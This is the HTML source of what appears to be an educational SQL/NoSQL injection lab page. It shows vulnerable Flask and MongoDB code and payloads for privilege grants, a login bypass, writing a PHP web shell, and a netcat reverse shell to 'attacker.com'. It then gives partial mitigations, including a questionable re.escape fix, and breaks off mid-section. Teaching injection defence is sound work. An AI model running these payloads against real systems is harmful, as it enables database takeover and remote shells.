Spaces:

S-Dreamer
/

databaseinjectionattacks

Running

File size: 11,274 Bytes

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>SQL/NoSQL Injection Exploitation Lab</title>
    <script src="https://cdn.tailwindcss.com"></script>
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">
    <style>
        .terminal {
            font-family: 'Courier New', monospace;
            background-color: #1e1e1e;
            color: #f8f8f2;
            border-radius: 0.5rem;
            padding: 1.5rem;
            overflow-x: auto;
            position: relative;
        }
        .terminal-header {
            background-color: #2d2d2d;
            padding: 0.5rem 1rem;
            border-top-left-radius: 0.5rem;
            border-top-right-radius: 0.5rem;
            display: flex;
            align-items: center;
        }
        .terminal-dot {
            width: 12px;
            height: 12px;
            border-radius: 50%;
            margin-right: 6px;
        }
        .terminal-red { background-color: #ff5f56; }
        .terminal-yellow { background-color: #ffbd2e; }
        .terminal-green { background-color: #27c93f; }
        .terminal-cursor {
            display: inline-block;
            width: 8px;
            height: 16px;
            background-color: #f8f8f2;
            animation: blink 1s infinite;
        }
        @keyframes blink {
            0%, 100% { opacity: 1; }
            50% { opacity: 0; }
        }
        .code-block {
            font-family: 'Courier New', monospace;
            background-color: #2d2d2d;
            color: #f8f8f2;
            border-radius: 0.5rem;
            padding: 1rem;
            overflow-x: auto;
            position: relative;
        }
        .tab-content {
            display: none;
        }
        .tab-content.active {
            display: block;
            animation: fadeIn 0.3s ease-in-out;
        }
        @keyframes fadeIn {
            from { opacity: 0; }
            to { opacity: 1; }
        }
        .attack-card {
            transition: all 0.3s ease;
        }
        .attack-card:hover {
            transform: translateY(-5px);
            box-shadow: 0 10px 25px rgba(0, 0, 0, 0.1);
        }
        .blink {
            animation: blink 1s infinite;
        }
    </style>
</head>
<body class="bg-gray-900 text-gray-100 min-h-screen">
    <div class="container mx-auto px-4 py-8">
        <!-- Terminal Header -->
        <div class="terminal mb-8">
            <div class="terminal-header">
                <div class="terminal-dot terminal-red"></div>
                <div class="terminal-dot terminal-yellow"></div>
                <div class="terminal-dot terminal-green"></div>
                <div class="ml-2 text-sm">pentester@secure-lab:~/sql_injection/_</div>
            </div>
            <div class="mt-2">
                <div class="text-green-400">$ <span class="typing-text"></span><span class="terminal-cursor"></span></div>
                <div id="terminal-output" class="mt-4"></div>
            </div>
        </div>

        <!-- Main Content -->
        <div class="grid grid-cols-1 lg:grid-cols-2 gap-8 mb-12">
            <!-- Privilege Escalation Card -->
            <div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card">
                <div class="p-6">
                    <div class="flex items-center mb-4">
                        <div class="bg-red-900 p-3 rounded-full mr-4">
                            <i class="fas fa-user-shield text-red-400 text-xl"></i>
                        </div>
                        <h2 class="text-2xl font-bold text-white">Privilege Escalation</h2>
                    </div>
                    
                    <div class="mb-6">
                        <h3 class="text-lg font-semibold text-gray-300 mb-3">SQL Injection</h3>
                        <div class="code-block mb-2">
                            <span class="text-gray-400"># Vulnerable Flask endpoint</span><br>
                            @app.route('/user/&lt;int:user_id&gt;')<br>
                            def get_user(user_id):<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;query = f"SELECT * FROM users WHERE id = {user_id}"<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;result = db.execute(query)<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;return jsonify(result.fetchall())<br><br>
                            <span class="text-gray-400"># Attack payload:</span><br>
                            /user/1; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%' IDENTIFIED BY 'pwned123'--
                        </div>
                    </div>
                    
                    <div class="mb-6">
                        <h3 class="text-lg font-semibold text-gray-300 mb-3">NoSQL Injection</h3>
                        <div class="code-block mb-2">
                            <span class="text-gray-400">// Vulnerable MongoDB query</span><br>
                            db.users.find({<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;username: req.body.username,<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;password: req.body.password<br>
                            });<br><br>
                            <span class="text-gray-400">// Attack payload (JSON):</span><br>
                            {<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;"username": {"$ne": null},<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;"password": {"$ne": null}<br>
                            }
                        </div>
                    </div>
                </div>
            </div>

            <!-- Command Execution Card -->
            <div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden attack-card">
                <div class="p-6">
                    <div class="flex items-center mb-4">
                        <div class="bg-blue-900 p-3 rounded-full mr-4">
                            <i class="fas fa-terminal text-blue-400 text-xl"></i>
                        </div>
                        <h2 class="text-2xl font-bold text-white">Command Execution</h2>
                    </div>
                    
                    <div class="mb-6">
                        <h3 class="text-lg font-semibold text-gray-300 mb-3">MySQL Command Execution</h3>
                        <div class="code-block mb-2">
                            <span class="text-gray-400">-- Enable command execution</span><br>
                            SELECT * FROM users WHERE id = 1;<br>
                            SELECT sys_exec('whoami'); --<br><br>
                            <span class="text-gray-400">-- Writing web shell</span><br>
                            SELECT '&lt;?php system($_GET["cmd"]); ?&gt;'<br>
                            INTO OUTFILE '/var/www/html/shell.php'; --
                        </div>
                    </div>
                    
                    <div class="mb-6">
                        <h3 class="text-lg font-semibold text-gray-300 mb-3">PostgreSQL Exploitation</h3>
                        <div class="code-block mb-2">
                            <span class="text-gray-400"># Vulnerable Flask code</span><br>
                            @app.route('/search')<br>
                            def search():<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;query = request.args.get('q')<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;sql = f"SELECT * FROM products WHERE name LIKE '%{query}%'"<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;return execute_query(sql)<br><br>
                            <span class="text-gray-400"># Attack payload:</span><br>
                            /search?q='; COPY (SELECT '') TO PROGRAM 'nc -e /bin/bash attacker.com 4444'; --
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <!-- Mitigation Section -->
        <div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden mb-12">
            <div class="p-6">
                <h2 class="text-2xl font-bold text-white mb-6">Secure Mitigation Strategies</h2>
                
                <div class="grid grid-cols-1 md:grid-cols-2 gap-6">
                    <div class="bg-gray-700 p-4 rounded-lg border border-gray-600">
                        <div class="flex items-center mb-3">
                            <i class="fas fa-shield-alt text-green-400 mr-3"></i>
                            <h3 class="text-lg font-semibold text-white">SQLAlchemy ORM</h3>
                        </div>
                        <div class="code-block text-sm">
                            <span class="text-gray-400"># SECURE: Using SQLAlchemy ORM</span><br>
                            @app.route('/user/&lt;int:user_id&gt;')<br>
                            def get_user_secure(user_id):<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;user = User.query.filter_by(id=user_id).first()<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;if user:<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return jsonify({<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id': user.id,<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username': user.username<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;})<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;return jsonify({'error': 'User not found'}), 404
                        </div>
                    </div>
                    
                    <div class="bg-gray-700 p-4 rounded-lg border border-gray-600">
                        <div class="flex items-center mb-3">
                            <i class="fas fa-lock text-green-400 mr-3"></i>
                            <h3 class="text-lg font-semibold text-white">NoSQL Injection Prevention</h3>
                        </div>
                        <div class="code-block text-sm">
                            <span class="text-gray-400"># SECURE: NoSQL injection prevention</span><br>
                            def authenticate_user_secure(username, password):<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;if not isinstance(username, str):<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;return None<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;username = re.escape(username)<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;user = db.users.find_one({<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username': username,<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'password': hash_password(password)<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;})<br>
                            &nbsp;&nbsp;&nbsp;&nbsp;return user
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <!-- Advanced Defenses -->
        <div class="bg-gray-800 rounded-xl shadow-lg overflow-hidden">
            <
</html>